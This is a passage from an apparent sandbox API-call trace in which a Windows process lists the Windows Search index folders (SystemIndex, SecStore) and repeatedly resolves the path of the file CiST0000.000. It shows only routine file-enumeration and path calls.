ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.585] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27eb7240, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.585] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 1 [0252.585] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.585] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.587] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects", lpFilePart=0x0) returned 0x46 [0252.587] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\", lpFilePart=0x0) returned 0x47 [0252.587] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27eb7240, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.587] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27eb7240, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.588] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 1 [0252.588] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 0 [0252.588] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.588] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex", lpFilePart=0x0) returned 0x52 [0252.588] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\", lpFilePart=0x0) returned 0x53 [0252.588] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.589] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.590] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexer", cAlternateFileName="")) returned 1 [0252.590] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PropMap", cAlternateFileName="")) returned 1 [0252.590] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecStore", cAlternateFileName="")) returned 1 [0252.590] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.590] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.590] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex", lpFilePart=0x0) returned 0x52 [0252.590] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\", lpFilePart=0x0) returned 0x53 [0252.591] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.591] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.591] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexer", cAlternateFileName="")) returned 1 [0252.591] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PropMap", cAlternateFileName="")) returned 1 [0252.591] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecStore", cAlternateFileName="")) returned 1 [0252.592] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecStore", cAlternateFileName="")) returned 0 [0252.592] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.592] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore", lpFilePart=0x0) returned 0x5b [0252.592] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\", lpFilePart=0x0) returned 0x5c [0252.592] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.592] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.593] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.000", cAlternateFileName="")) returned 1 [0252.593] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.001", cAlternateFileName="")) returned 1 [0252.593] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.002", cAlternateFileName="")) returned 1 [0252.593] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.002", cAlternateFileName="")) returned 0 [0252.594] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.594] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore", lpFilePart=0x0) returned 0x5b [0252.594] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\", lpFilePart=0x0) returned 0x5c [0252.594] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.594] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.595] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.000", cAlternateFileName="")) returned 1 [0252.595] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.001", cAlternateFileName="")) returned 1 [0252.595] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.002", cAlternateFileName="")) returned 1 [0252.595] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.595] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.595] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.595] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.595] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.595] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.595] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", lpFilePart=0x0) returned 0x68 [0252.596] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.000", 